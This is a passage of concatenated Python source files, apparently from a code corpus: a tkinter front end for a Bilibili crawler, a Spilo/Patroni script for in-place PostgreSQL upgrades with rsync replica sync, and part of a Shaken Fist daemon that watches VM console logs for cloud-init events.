tid_entry.insert(tid)
if event.keycode == 8 :
tid_entry.delete(tid_entry.index(tk.INSERT)-1,tk.INSERT)
elif event.keycode in (37,39):
if tid_entry.index(tk.INSERT) > len(tid)-1:
tid_entry.icursor(len(tid)-1)
tid_entry.select_range(0,tk.INSERT)
return
if tid:
tid = tid.rstrip()
info = list(filter(lambda line:line[0].startswith(tid) or line[0]==tid,self.tid_info))
#print(info)
if len(info) > 0:
index = tid_entry.index(tk.INSERT)
tid_entry.delete(0,tk.END)
tid_entry.insert(0," - ".join(info[0]))
tid_entry.icursor(index)
if index < len(info[0][0]):
#tid_entry.select_range(tk.INSERT,tk.END)
tid_entry.select_range(tk.INSERT,len(info[0][0]))
else :
tid_entry.delete(tk.INSERT,tk.END)
def tid_entry_onreturn(self,event):
self.tid_entry_focusout(event)
self.on_start()
def url_entry_focusin(self,event):
self.url_entry.select_range(0,tk.END)
self.tid_info_label.config(text="按下回车以获取tid")
def load_tid_info(self):
try:
from pkg_resources import resource_string
tid_info_str = resource_string('bilispider', 'data/tid.txt').decode()
except:
print("无法载入")
return tuple()
tid_info = [line.split(',') for line in tid_info_str.split('\r\n')]
return tid_info
def on_start(self):
os.chdir(self.working_path.get())
config = self.config
try:
config['tid'] = (int(self.tid_entry.get().split(" - ")[0]),)
except:
tkmsgbox.showwarning("警告","分区id无效")
return
config['output'] = 0
config['thread_num'] = int(self.thread_num.get())
config['http'] = int(self.http_port.get())
config['gui_output'] = self.output_choice.get()
config['save_full'] = self.get_full_info.get()
self.root.withdraw() #隐藏主窗口
process_window(config,self).show_window()
class process_window():
def __init__(self,config,father):
self.config = config
self.father = father
def show_window(self):
root = tk.Tk()
root.title("bilispider")
root.resizable(0,0)
top_frame = tk.Frame(root)
top_frame.pack(fill=tk.BOTH)
process_bar = ttk.Progressbar(top_frame,mode="indeterminate",length=300)
process_bar.pack(anchor='w',side=tk.LEFT)
progress_label = ttk.Label(top_frame,text="初始化")
progress_label.pack(after=process_bar)
mid_frame = tk.Frame(root)
mid_frame.pack()
log_text = tk.Text(mid_frame,height=20,width=60)
log_text.pack(side=tk.LEFT,fill=tk.Y)
log_scrollbar = tk.Scrollbar(mid_frame)
log_scrollbar.pack(side=tk.LEFT,after=log_text,fill=tk.Y)
log_scrollbar.config(command=log_text.yview)
log_text.config(yscrollcommand=log_scrollbar.set)
buttom_frame = ttk.Frame(root)
buttom_frame.pack(fill=tk.BOTH)
ttk.Button(buttom_frame,text="显示更多",command=self.show_more_info).pack(side=tk.LEFT,padx=(80,0))
pause_botton = ttk.Button(buttom_frame,text="暂停",command=self.set_pause)
pause_botton.pack(side=tk.RIGHT,padx=(0,80))
process_bar.start()
root.protocol("WM_DELETE_WINDOW", self.processwindow_on_closing)
spider = spider_gui_mode(self.config['tid'][0],self.config)
spider.start()
self.root = root
self.process_bar = process_bar
self.log_text = log_text
self.progress_label = progress_label
self.spider = spider
self.pause_botton = pause_botton
threading.Thread(target=self.monitor_loop,daemon=True).start()
root.mainloop()
def set_pause(self,multi=False):
if multi:
self.pause_botton.config(state=tk.DISABLED)
self.root.update()
self.spider.set_pause(1)
self.pause_botton.config(text='继续',command=self.set_continue)
self.pause_botton.config(state=tk.NORMAL)
else:
threading.Thread(target=self.set_pause,args=(True,),name="set_pause").start()
def set_continue(self):
self.pause_botton.config(state=tk.DISABLED)
self.root.update()
self.spider.set_pause(0)
self.pause_botton.config(text='暂停',command=self.set_pause)
self.pause_botton.config(state=tk.NORMAL)
def processwindow_on_closing(self):
if self.spider.is_alive():
if tkmsgbox.askokcancel("确认退出", "爬虫正在运行,若强制退出可能损失部分数据"):
# if self.spider.get_http_thread():
# try:
# requests.get('http://localhost:1214/exit',timeout=0.1)
# except:
# pass
self.father.root.destroy()
self.root.destroy()
sys.exit()
else:
# if self.spider.get_http_thread():
# try:
# requests.get('http://localhost:1214/exit',timeout=0.1)
# except:
# pass
self.father.root.destroy()
self.root.destroy()
sys.exit()
def show_log(self):
log_text = self.log_text
while not self.spider.get_logger().empty():
log_line = self.spider.get_logger().get(block=False)
if self.output_level == 1 and log_line[0] < 2:
continue
elif self.output_level == 2 and log_line[0] < 4:
continue
strtime = time.strftime("%H:%M:%S", time.localtime(log_line[1]))
line_index = int(log_text.index(tk.END).split('.')[0])-1
log_level = self.log_level_list[log_line[0]]
log_text.insert(tk.END,"[{}][{}]{}\n".format(strtime,log_level,log_line[2]))
log_text.tag_add(log_level,"%s.%s"%(line_index,10),"%s.%s"%(line_index,len(log_level)+12))
log_text.tag_add("time","%s.%s"%(line_index,0),"%s.%s"%(line_index,10))
log_text.see(tk.END)
def monitor_loop(self):
log_text = self.log_text
self.process_bar.stop()
self.process_bar.config(mode="determinate")
self.output_level = self.config['gui_output']
self.log_level_list= ('','DEBUG','INFO','WARNING','ERROR','FATAL')
log_text.tag_config("DEBUG",foreground="forestgreen")
log_text.tag_config("INFO",foreground="blue")
log_text.tag_config("WARNING",foreground="orange")
log_text.tag_config("ERROR",foreground="yellow",background="red")
log_text.tag_config("FATAL",foreground="orangered",background="black")
log_text.tag_config("time",foreground="dimgray")
while True:
self.show_log()
persentage = self.spider.status.get('percentage',0)*100
self.process_bar.config(value = persentage)
self.progress_label.config(text= "%.2f" % persentage +" %" )
if not self.spider.is_alive():
break
time.sleep(0.1)
self.show_log()
if self.spider.status['progress'] == 'fatal':
self.process_bar.config(value=0)
self.progress_label.config(text="失败")
else:
self.process_bar.config(value=100)
self.progress_label.config(text="完成")
def show_more_info(self):
detail_window(self).show_window()
class detail_window():
def __init__(self,father):
self.father = father
def show_window(self):
root = tk.Tk()
self.detail_text = tk.Text(root,height = 13,width = 45)
self.detail_text.pack()
root.protocol("WM_DELETE_WINDOW", self.detailwindow_on_closing)
self.flag = True
threading.Thread(target=self.refresh,daemon=True).start()
self.root = root
root.mainloop()
def refresh(self):
#self.detail_text.insert(1.0,' ')
while self.flag:
self.detail_text.delete(1.0,tk.END)
detail = "\n".join(":".join(map(str,i)) for i in self.father.spider.status.items())
self.detail_text.insert(1.0,detail)
time.sleep(0.5)
def detailwindow_on_closing(self):
self.flag = False
self.root.destroy()
if __name__ == "__main__":
root_window().show_window()
|
inplace_upgrade.py
|
#!/usr/bin/env python
import json
import logging
import os
import psutil
import psycopg2
import shlex
import shutil
import subprocess
import sys
import time
import yaml
from collections import defaultdict
from threading import Thread
from multiprocessing.pool import ThreadPool
logger = logging.getLogger(__name__)
RSYNC_PORT = 5432
def patch_wale_prefix(value, new_version):
from spilo_commons import is_valid_pg_version
if '/spilo/' in value and '/wal/' in value: # path crafted in the configure_spilo.py?
basename, old_version = os.path.split(value.rstrip('/'))
if is_valid_pg_version(old_version) and old_version != new_version:
return os.path.join(basename, new_version)
return value
def update_configs(new_version):
from spilo_commons import append_extentions, get_bin_dir, get_patroni_config, write_file, write_patroni_config
config = get_patroni_config()
config['postgresql']['bin_dir'] = get_bin_dir(new_version)
version = float(new_version)
shared_preload_libraries = config['postgresql'].get('parameters', {}).get('shared_preload_libraries')
if shared_preload_libraries is not None:
config['postgresql']['parameters']['shared_preload_libraries'] =\
append_extentions(shared_preload_libraries, version)
extwlist_extensions = config['postgresql'].get('parameters', {}).get('extwlist.extensions')
if extwlist_extensions is not None:
config['postgresql']['parameters']['extwlist.extensions'] =\
append_extentions(extwlist_extensions, version, True)
write_patroni_config(config, True)
# update wal-e/wal-g envdir files
restore_command = shlex.split(config['postgresql'].get('recovery_conf', {}).get('restore_command', ''))
if len(restore_command) > 4 and restore_command[0] == 'envdir':
envdir = restore_command[1]
try:
for name in os.listdir(envdir):
# len('WALE__PREFIX') = 12
if len(name) > 12 and name.endswith('_PREFIX') and name[:5] in ('WALE_', 'WALG_'):
name = os.path.join(envdir, name)
try:
with open(name) as f:
value = f.read().strip()
new_value = patch_wale_prefix(value, new_version)
if new_value != value:
write_file(new_value, name, True)
except Exception as e:
logger.error('Failed to process %s: %r', name, e)
except Exception:
pass
else:
return envdir
def kill_patroni():
logger.info('Restarting patroni')
patroni = next(iter(filter(lambda p: p.info['name'] == 'patroni', psutil.process_iter(['name']))), None)
if patroni:
patroni.kill()
class InplaceUpgrade(object):
def __init__(self, config):
from patroni.dcs import get_dcs
from patroni.request import PatroniRequest
from pg_upgrade import PostgresqlUpgrade
self.config = config
self.postgresql = PostgresqlUpgrade(config)
self.cluster_version = self.postgresql.get_cluster_version()
self.desired_version = self.get_desired_version()
self.upgrade_required = float(self.cluster_version) < float(self.desired_version)
self.paused = False
self.new_data_created = False
self.upgrade_complete = False
self.rsyncd_configs_created = False
self.rsyncd_started = False
if self.upgrade_required:
self.dcs = get_dcs(config)
self.request = PatroniRequest(config, True)
@staticmethod
def get_desired_version():
from spilo_commons import get_bin_dir, get_binary_version
try:
spilo_configuration = yaml.safe_load(os.environ.get('SPILO_CONFIGURATION', ''))
bin_dir = spilo_configuration.get('postgresql', {}).get('bin_dir')
except Exception:
bin_dir = None
if not bin_dir and os.environ.get('PGVERSION'):
bin_dir = get_bin_dir(os.environ['PGVERSION'])
return get_binary_version(bin_dir)
def check_patroni_api(self, member):
try:
response = self.request(member, timeout=2, retries=0)
return response.status == 200
except Exception as e:
return logger.error('API request to %s name failed: %r', member.name, e)
def toggle_pause(self, paused):
from patroni.utils import polling_loop
cluster = self.dcs.get_cluster()
config = cluster.config.data.copy()
if cluster.is_paused() == paused:
return logger.error('Cluster is %spaused, can not continue', ('' if paused else 'not '))
config['pause'] = paused
if not self.dcs.set_config_value(json.dumps(config, separators=(',', ':')), cluster.config.index):
return logger.error('Failed to pause cluster, can not continue')
self.paused = paused
old = {m.name: m.index for m in cluster.members if m.api_url}
ttl = cluster.config.data.get('ttl', self.dcs.ttl)
for _ in polling_loop(ttl + 1):
cluster = self.dcs.get_cluster()
if all(m.data.get('pause', False) == paused for m in cluster.members if m.name in old):
logger.info('Maintenance mode %s', ('enabled' if paused else 'disabled'))
return True
remaining = [m.name for m in cluster.members if m.data.get('pause', False) != paused
and m.name in old and old[m.name] != m.index]
if remaining:
return logger.error("%s members didn't recognized pause state after %s seconds", remaining, ttl)
def resume_cluster(self):
if self.paused:
try:
logger.info('Disabling maintenance mode')
self.toggle_pause(False)
except Exception as e:
logger.error('Failed to resume cluster: %r', e)
def ensure_replicas_state(self, cluster):
"""
This method checks the satatus of all replicas and also tries to open connections
to all of them and puts into the `self.replica_connections` dict for a future usage.
"""
self.replica_connections = {}
streaming = {a: l for a, l in self.postgresql.query(
("SELECT client_addr, pg_catalog.pg_{0}_{1}_diff(pg_catalog.pg_current_{0}_{1}(),"
" COALESCE(replay_{1}, '0/0'))::bigint FROM pg_catalog.pg_stat_replication")
.format(self.postgresql.wal_name, self.postgresql.lsn_name))}
def ensure_replica_state(member):
ip = member.conn_kwargs().get('host')
lag = streaming.get(ip)
if lag is None:
return logger.error('Member %s is not streaming from the primary', member.name)
if lag > 16*1024*1024:
return logger.error('Replication lag %s on member %s is too high', lag, member.name)
if not self.check_patroni_api(member):
return logger.error('Patroni on %s is not healthy', member.name)
conn_kwargs = member.conn_kwargs(self.postgresql.config.superuser)
conn_kwargs['options'] = '-c statement_timeout=0 -c search_path='
conn_kwargs.pop('connect_timeout', None)
conn = psycopg2.connect(**conn_kwargs)
conn.autocommit = True
cur = conn.cursor()
cur.execute('SELECT pg_catalog.pg_is_in_recovery()')
if not cur.fetchone()[0]:
return logger.error('Member %s is not running as replica!', member.name)
self.replica_connections[member.name] = (ip, cur)
return True
return all(ensure_replica_state(member) for member in cluster.members if member.name != self.postgresql.name)
def sanity_checks(self, cluster):
if not cluster.initialize:
return logger.error('Upgrade can not be triggered because the cluster is not initialized')
if len(cluster.members) != self.replica_count:
return logger.error('Upgrade can not be triggered because the number of replicas does not match (%s != %s)',
len(cluster.members), self.replica_count)
if cluster.is_paused():
return logger.error('Upgrade can not be triggered because Patroni is in maintenance mode')
lock_owner = cluster.leader and cluster.leader.name
if lock_owner != self.postgresql.name:
return logger.error('Upgrade can not be triggered because the current node does not own the leader lock')
return self.ensure_replicas_state(cluster)
def remove_initialize_key(self):
from patroni.utils import polling_loop
for _ in polling_loop(10):
cluster = self.dcs.get_cluster()
if cluster.initialize is None:
return True
logging.info('Removing initialize key')
if self.dcs.cancel_initialization():
return True
logger.error('Failed to remove initialize key')
def wait_for_replicas(self, checkpoint_lsn):
from patroni.utils import polling_loop
logger.info('Waiting for replica nodes to catch up with primary')
query = ("SELECT pg_catalog.pg_{0}_{1}_diff(pg_catalog.pg_last_{0}_replay_{1}(),"
" '0/0')::bigint").format(self.postgresql.wal_name, self.postgresql.lsn_name)
status = {}
for _ in polling_loop(60):
synced = True
for name, (_, cur) in self.replica_connections.items():
prev = status.get(name)
if prev and prev >= checkpoint_lsn:
continue
cur.execute(query)
lsn = cur.fetchone()[0]
status[name] = lsn
if lsn < checkpoint_lsn:
synced = False
if synced:
logger.info('All replicas are ready')
return True
for name in self.replica_connections.keys():
lsn = status.get(name)
if not lsn or lsn < checkpoint_lsn:
logger.error('Node %s did not catched up. Lag=%s', name, checkpoint_lsn - lsn)
def create_rsyncd_configs(self):
self.rsyncd_configs_created = True
self.rsyncd_conf_dir = '/run/rsync'
self.rsyncd_feedback_dir = os.path.join(self.rsyncd_conf_dir, 'feedback')
if not os.path.exists(self.rsyncd_feedback_dir):
os.makedirs(self.rsyncd_feedback_dir)
self.rsyncd_conf = os.path.join(self.rsyncd_conf_dir, 'rsyncd.conf')
secrets_file = os.path.join(self.rsyncd_conf_dir, 'rsyncd.secrets')
auth_users = ','.join(self.replica_connections.keys())
replica_ips = ','.join(str(v[0]) for v in self.replica_connections.values())
with open(self.rsyncd_conf, 'w') as f:
f.write("""port = {0}
use chroot = false
[pgroot]
path = {1}
read only = true
timeout = 300
post-xfer exec = echo $RSYNC_EXIT_STATUS > {2}/$RSYNC_USER_NAME
auth users = {3}
secrets file = {4}
hosts allow = {5}
hosts deny = *
""".format(RSYNC_PORT, os.path.dirname(self.postgresql.data_dir),
self.rsyncd_feedback_dir, auth_users, secrets_file, replica_ips))
with open(secrets_file, 'w') as f:
for name in self.replica_connections.keys():
f.write('{0}:{1}\n'.format(name, self.postgresql.config.replication['password']))
os.chmod(secrets_file, 0o600)
def start_rsyncd(self):
self.create_rsyncd_configs()
self.rsyncd = subprocess.Popen(['rsync', '--daemon', '--no-detach', '--config=' + self.rsyncd_conf])
self.rsyncd_started = True
def stop_rsyncd(self):
if self.rsyncd_started:
logger.info('Stopping rsyncd')
try:
self.rsyncd.kill()
self.rsyncd_started = False
except Exception as e:
return logger.error('Failed to kill rsyncd: %r', e)
if self.rsyncd_configs_created and os.path.exists(self.rsyncd_conf_dir):
try:
shutil.rmtree(self.rsyncd_conf_dir)
self.rsyncd_configs_created = False
except Exception as e:
logger.error('Failed to remove %s: %r', self.rsync_conf_dir, e)
def checkpoint(self, member):
name, (_, cur) = member
try:
cur.execute('CHECKPOINT')
return name, True
except Exception as e:
logger.error('CHECKPOINT on % failed: %r', name, e)
return name, False
def rsync_replicas(self, primary_ip):
from patroni.utils import polling_loop
logger.info('Notifying replicas %s to start rsync', ','.join(self.replica_connections.keys()))
ret = True
status = {}
for name, (ip, cur) in self.replica_connections.items():
try:
cur.execute("SELECT pg_catalog.pg_backend_pid()")
pid = cur.fetchone()[0]
# We use the COPY TO PROGRAM "hack" to start the rsync on replicas.
# There are a few important moments:
# 1. The script is started as a child process of postgres backend, which
# is running with the clean environment. I.e., the script will not see
# values of PGVERSION, SPILO_CONFIGURATION, KUBERNETES_SERVICE_HOST
# 2. Since access to the DCS might not be possible with pass the primary_ip
# 3. The desired_version passed explicitly to guaranty 100% match with the master
# 4. In order to protect from the accidental "rsync" we pass the pid of postgres backend.
# The script will check that it is the child of the very specific postgres process.
cur.execute("COPY (SELECT) TO PROGRAM 'nohup {0} /scripts/inplace_upgrade.py {1} {2} {3}'"
.format(sys.executable, self.desired_version, primary_ip, pid))
conn = cur.connection
cur.close()
conn.close()
except Exception as e:
logger.error('COPY TO PROGRAM on %s failed: %r', name, e)
status[name] = False
ret = False
for name in status.keys():
self.replica_connections.pop(name)
logger.info('Waiting for replicas rsync to complete')
status.clear()
for _ in polling_loop(300):
synced = True
for name in self.replica_connections.keys():
feedback = os.path.join(self.rsyncd_feedback_dir, name)
if name not in status and os.path.exists(feedback):
with open(feedback) as f:
status[name] = f.read().strip()
if name not in status:
synced = False
if synced:
break
for name in self.replica_connections.keys():
result = status.get(name)
if result is None:
logger.error('Did not received rsync feedback from %s after 300 seconds', name)
ret = False
elif not result.startswith('0'):
logger.error('Rsync on %s finished with code %s', name, result)
ret = False
return ret
def wait_replica_restart(self, member):
from patroni.utils import polling_loop
for _ in polling_loop(10):
try:
response = self.request(member, timeout=2, retries=0)
if response.status == 200:
data = json.loads(response.data.decode('utf-8'))
database_system_identifier = data.get('database_system_identifier')
if database_system_identifier and database_system_identifier != self._old_sysid:
return member.name
except Exception:
pass
logger.error('Patroni on replica %s was not restarted in 10 seconds', member.name)
def wait_replicas_restart(self, cluster):
members = [member for member in cluster.members if member.name in self.replica_connections]
logger.info('Waiting for restart of patroni on replicas %s', ', '.join(m.name for m in members))
pool = ThreadPool(len(members))
results = pool.map(self.wait_replica_restart, members)
pool.close()
pool.join()
logger.info(' %s successfully restarted', results)
return all(results)
def reset_custom_statistics_target(self):
from patroni.postgresql.connection import get_connection_cursor
logger.info('Resetting non-default statistics target before analyze')
self._statistics = defaultdict(lambda: defaultdict(dict))
conn_kwargs = self.postgresql.local_conn_kwargs
for d in self.postgresql.query('SELECT datname FROM pg_catalog.pg_database WHERE datallowconn'):
conn_kwargs['database'] = d[0]
with get_connection_cursor(**conn_kwargs) as cur:
cur.execute('SELECT attrelid::regclass, quote_ident(attname), attstattarget '
'FROM pg_catalog.pg_attribute WHERE attnum > 0 AND NOT attisdropped AND attstattarget > 0')
for table, column, target in cur.fetchall():
query = 'ALTER TABLE {0} ALTER COLUMN {1} SET STATISTICS -1'.format(table, column)
logger.info("Executing '%s' in the database=%s. Old value=%s", query, d[0], target)
cur.execute(query)
self._statistics[d[0]][table][column] = target
def restore_custom_statistics_target(self):
from patroni.postgresql.connection import get_connection_cursor
if not self._statistics:
return
conn_kwargs = self.postgresql.local_conn_kwargs
logger.info('Restoring default statistics targets after upgrade')
for db, val in self._statistics.items():
conn_kwargs['database'] = db
with get_connection_cursor(**conn_kwargs) as cur:
for table, val in val.items():
for column, target in val.items():
query = 'ALTER TABLE {0} ALTER COLUMN {1} SET STATISTICS {2}'.format(table, column, target)
logger.info("Executing '%s' in the database=%s", query, db)
try:
cur.execute(query)
except Exception:
logger.error("Failed to execute '%s'", query)
def reanalyze(self):
from patroni.postgresql.connection import get_connection_cursor
if not self._statistics:
return
conn_kwargs = self.postgresql.local_conn_kwargs
for db, val in self._statistics.items():
conn_kwargs['database'] = db
with get_connection_cursor(**conn_kwargs) as cur:
for table in val.keys():
query = 'ANALYZE {0}'.format(table)
logger.info("Executing '%s' in the database=%s", query, db)
try:
cur.execute(query)
except Exception:
logger.error("Failed to execute '%s'", query)
def analyze(self):
try:
self.reset_custom_statistics_target()
except Exception as e:
logger.error('Failed to reset custom statistics targets: %r', e)
self.postgresql.analyze(True)
try:
self.restore_custom_statistics_target()
except Exception as e:
logger.error('Failed to restore custom statistics targets: %r', e)
def do_upgrade(self):
from patroni.utils import polling_loop
if not self.upgrade_required:
logger.info('Current version=%s, desired version=%s. Upgrade is not required',
self.cluster_version, self.desired_version)
return True
if not (self.postgresql.is_running() and self.postgresql.is_leader()):
return logger.error('PostgreSQL is not running or in recovery')
cluster = self.dcs.get_cluster()
if not self.sanity_checks(cluster):
return False
self._old_sysid = self.postgresql.sysid # remember old sysid
logger.info('Cluster %s is ready to be upgraded', self.postgresql.scope)
if not self.postgresql.prepare_new_pgdata(self.desired_version):
return logger.error('initdb failed')
try:
self.postgresql.drop_possibly_incompatible_extensions()
except Exception:
return logger.error('Failed to drop possibly incompatible extensions')
if not self.postgresql.pg_upgrade(check=True):
return logger.error('pg_upgrade --check failed, more details in the %s_upgrade', self.postgresql.data_dir)
try:
self.postgresql.drop_possibly_incompatible_objects()
except Exception:
return logger.error('Failed to drop possibly incompatible objects')
logging.info('Enabling maintenance mode')
if not self.toggle_pause(True):
return False
logger.info('Doing a clean shutdown of the cluster before pg_upgrade')
downtime_start = time.time()
if not self.postgresql.stop(block_callbacks=True):
return logger.error('Failed to stop the cluster before pg_upgrade')
if self.replica_connections:
checkpoint_lsn = int(self.postgresql.latest_checkpoint_location())
logger.info('Latest checkpoint location: %s', checkpoint_lsn)
logger.info('Starting rsyncd')
self.start_rsyncd()
if not self.wait_for_replicas(checkpoint_lsn):
return False
if not (self.rsyncd.pid and self.rsyncd.poll() is None):
return logger.error('Failed to start rsyncd')
if self.replica_connections:
logger.info('Executing CHECKPOINT on replicas %s', ','.join(self.replica_connections.keys()))
pool = ThreadPool(len(self.replica_connections))
# Do CHECKPOINT on replicas in parallel with pg_upgrade.
# It will reduce the time for shutdown and so downtime.
results = pool.map_async(self.checkpoint, self.replica_connections.items())
pool.close()
if not self.postgresql.pg_upgrade():
return logger.error('Failed to upgrade cluster from %s to %s', self.cluster_version, self.desired_version)
self.postgresql.switch_pgdata()
self.upgrade_complete = True
logger.info('Updating configuration files')
envdir = update_configs(self.desired_version)
ret = True
if self.replica_connections:
# Check status of replicas CHECKPOINT and remove connections that are failed.
pool.join()
if results.ready():
for name, status in results.get():
if not status:
ret = False
self.replica_connections.pop(name)
member = cluster.get_member(self.postgresql.name)
if self.replica_connections:
primary_ip = member.conn_kwargs().get('host')
rsync_start = time.time()
try:
if not self.rsync_replicas(primary_ip):
ret = False
except Exception as e:
logger.error('rsync failed: %r', e)
ret = False
logger.info('Rsync took %s seconds', time.time() - rsync_start)
self.stop_rsyncd()
time.sleep(2) # Give replicas a bit of time to switch PGDATA
self.remove_initialize_key()
kill_patroni()
self.remove_initialize_key()
time.sleep(1)
for _ in polling_loop(10):
if self.check_patroni_api(member):
break
else:
logger.error('Patroni REST API on primary is not accessible after 10 seconds')
logger.info('Starting the primary postgres up')
for _ in polling_loop(10):
try:
result = self.request(member, 'post', 'restart', {})
logger.info(' %s %s', result.status, result.data.decode('utf-8'))
if result.status < 300:
break
except Exception as e:
logger.error('POST /restart failed: %r', e)
else:
logger.error('Failed to start primary after upgrade')
logger.info('Upgrade downtime: %s', time.time() - downtime_start)
try:
self.postgresql.update_extensions()
except Exception as e:
logger.error('Failed to update extensions: %r', e)
# start analyze early
analyze_thread = Thread(target=self.analyze)
analyze_thread.start()
if self.replica_connections:
self.wait_replicas_restart(cluster)
self.resume_cluster()
analyze_thread.join()
self.reanalyze()
logger.info('Total upgrade time (with analyze): %s', time.time() - downtime_start)
self.postgresql.bootstrap.call_post_bootstrap(self.config['bootstrap'])
self.postgresql.cleanup_old_pgdata()
if envdir:
self.start_backup(envdir)
return ret
def post_cleanup(self):
self.stop_rsyncd()
self.resume_cluster()
if self.new_data_created:
try:
self.postgresql.cleanup_new_pgdata()
except Exception as e:
logger.error('Failed to remove new PGDATA %r', e)
def try_upgrade(self, replica_count):
try:
self.replica_count = replica_count
return self.do_upgrade()
finally:
self.post_cleanup()
def start_backup(self, envdir):
logger.info('Initiating a new backup...')
if not os.fork():
subprocess.call(['nohup', 'envdir', envdir, '/scripts/postgres_backup.sh', self.postgresql.data_dir],
stdout=open(os.devnull, 'w'), stderr=subprocess.STDOUT)
# this function will be running in a clean environment, therefore we can't rely on DCS connection
def rsync_replica(config, desired_version, primary_ip, pid):
from pg_upgrade import PostgresqlUpgrade
from patroni.utils import polling_loop
me = psutil.Process()
# check that we are the child of postgres backend
if me.parent().pid != pid and me.parent().parent().pid != pid:
return 1
backend = psutil.Process(pid)
if 'postgres' not in backend.name():
return 1
postgresql = PostgresqlUpgrade(config)
if postgresql.get_cluster_version() == desired_version:
return 0
if os.fork():
return 0
# Wait until the remote side will close the connection and backend process exits
for _ in polling_loop(10):
if not backend.is_running():
break
else:
logger.warning('Backend did not exit after 10 seconds')
sysid = postgresql.sysid # remember old sysid
if not postgresql.stop(block_callbacks=True):
logger.error('Failed to stop the cluster before rsync')
return 1
postgresql.switch_pgdata()
update_configs(desired_version)
env = os.environ.copy()
env['RSYNC_PASSWORD'] = postgresql.config.replication['password']
if subprocess.call(['rsync', '--archive', '--delete', '--hard-links', '--size-only', '--omit-dir-times',
'--no-inc-recursive', '--include=/data/***', '--include=/data_old/***',
'--exclude=/data/pg_xlog/*', '--exclude=/data_old/pg_xlog/*',
'--exclude=/data/pg_wal/*', '--exclude=/data_old/pg_wal/*', '--exclude=*',
'rsync://{0}@{1}:{2}/pgroot'.format(postgresql.name, primary_ip, RSYNC_PORT),
os.path.dirname(postgresql.data_dir)], env=env) != 0:
logger.error('Failed to rsync from %s', primary_ip)
postgresql.switch_back_pgdata()
# XXX: rollback configs?
return 1
conn_kwargs = {k: v for k, v in postgresql.config.replication.items() if v is not None}
if 'username' in conn_kwargs:
conn_kwargs['user'] = conn_kwargs.pop('username')
# If restart Patroni right now there is a chance that it will exit due to the sysid mismatch.
# Due to cleaned environment we can't always use DCS on replicas in this script, therefore
# the good indicator of initialize key being deleted/updated is running primary after the upgrade.
for _ in polling_loop(300):
try:
with postgresql.get_replication_connection_cursor(primary_ip, **conn_kwargs) as cur:
cur.execute('IDENTIFY_SYSTEM')
if cur.fetchone()[0] != sysid:
break
except Exception:
pass
# If the cluster was unpaused earlier than we restarted Patroni, it might have created
# the recovery.conf file and tried (and failed) to start the cluster up using wrong binaries.
# In case of upgrade to 12+ presence of PGDATA/recovery.conf will not allow postgres to start.
# We remove the recovery.conf and restart Patroni in order to make sure it is using correct config.
try:
postgresql.config.remove_recovery_conf()
except Exception:
pass
kill_patroni()
try:
postgresql.config.remove_recovery_conf()
except Exception:
pass
return postgresql.cleanup_old_pgdata()
def main():
from patroni.config import Config
from spilo_commons import PATRONI_CONFIG_FILE
config = Config(PATRONI_CONFIG_FILE)
if len(sys.argv) == 4:
desired_version = sys.argv[1]
primary_ip = sys.argv[2]
pid = int(sys.argv[3])
return rsync_replica(config, desired_version, primary_ip, pid)
elif len(sys.argv) == 2:
replica_count = int(sys.argv[1])
upgrade = InplaceUpgrade(config)
return 0 if upgrade.try_upgrade(replica_count) else 1
else:
return 2
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s inplace_upgrade %(levelname)s: %(message)s', level='INFO')
sys.exit(main())
|
triggers.py
|
from functools import partial
import multiprocessing
import os
import re
import setproctitle
import signal
import time
from shakenfist import baseobject
from shakenfist.config import config
from shakenfist.daemons import daemon
from shakenfist import db
from shakenfist import etcd
from shakenfist import logutil
from shakenfist import instance
LOG, _ = logutil.setup(__name__)
def observe(path, instance_uuid):
setproctitle.setproctitle(
'%s-%s' % (daemon.process_name('triggers'), instance_uuid))
regexps = {
'login prompt': re.compile('.* login: .*'),
'user-data script start': re.compile('.*Starting.*Execute cloud user/final scripts.*'),
'user-data script end': re.compile('.*Finished.*Execute cloud user/final scripts.*'),
'cloud-init complete': re.compile('.*Reached target.*Cloud-init target.*')
}
while not os.path.exists(path):
time.sleep(1)
fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK)
log_ctx = LOG.with_instance(instance_uuid)
log_ctx.with_field('path', path).info('Monitoring path for triggers')
db.add_event('instance', instance_uuid, 'trigger monitor',
'detected console log', None, None)
# Sometimes the trigger process is slow to start, so rewind 4KB to ensure
# that the last few log lines are not missed. (4KB since Cloud-Init can be
# noisy after the login prompt.)
os.lseek(fd, max(0, os.fstat(fd).st_size - 4096), os.SEEK_SET)
# Record how long the file is, because we need to detect truncations and
# re-open.
previous_size = os.stat(path).st_size
buffer = ''
while True:
# Detect file trunctations, and die if we see one. We will be restarted
# by the monitor process.
if not os.path.exists(path):
return
size = os.stat(path).st_size
if size < previous_size:
return
previous_size = size
# Read data, os.read() is non-blocking by the way.
d = os.read(fd, 1024).decode('utf-8', errors='ignore')
if d:
buffer += d
lines = buffer.split('\n')
buffer = lines[-1]
for line in lines:
if line:
for trigger in regexps:
m = regexps[trigger].match(line)
if m:
log_ctx.with_field('trigger', trigger,
).info('Trigger matched')
db.add_event('instance', instance_uuid, 'trigger',
None, None, trigger)
else:
# Only pause if there was no data to read
time.sleep(0.2)
class Monitor(daemon.Daemon):
def run(self):
LOG.info('Starting')
observers = {}
while self.running:
# Cleanup terminated observers
all_observers = list(observers.keys())
for instance_uuid in all_observers:
if not observers[instance_uuid].is_alive():
# Reap process
observers[instance_uuid].join(1)
LOG.with_instance(instance_uuid
).info('Trigger observer has terminated')
db.add_event(
'instance', instance_uuid, 'trigger monitor', 'crashed', None, None)
del observers[instance_uuid]
# Audit desired observers
extra_instances = list(observers.keys())
missing_instances = []
with etcd.ThreadLocalReadOnlyCache():
for inst in instance.Instances([
instance.this_node_filter,
partial(baseobject.state_filter, [instance.Instance.STATE_CREATED])]):
if inst.uuid in extra_instances:
extra_instances.remove(inst.uuid)
if inst.uuid not in observers:
missing_instances.append(inst.uuid)
# Start missing observers
for instance_uuid in missing_instances:
console_path = os.path.join(
config.STORAGE_PATH, 'instances', instance_uuid, 'console.log')
p = multiprocessing.Process(
target=observe, args=(console_path, instance_uuid),
name='%s-%s' % (daemon.process_name('triggers'),
instance_uuid))
p.start()
observers[instance_uuid] = p
LOG.with_instance(instance_uuid).info(
'Started trigger observer')
db.add_event(
'instance', instance_uuid, 'trigger monitor', 'started', None, None)
# Cleanup extra observers
for instance_uuid in extra_instances:
p = observers[instance_uuid]
try:
os.kill(p.pid, signal.SIGKILL)
observers[instance_uuid].join(1)
except Exception:
pass
del observers[instance_uuid]
LOG.with_instance(instance_uuid).info(
'Finished trigger observer')
db.add_event(
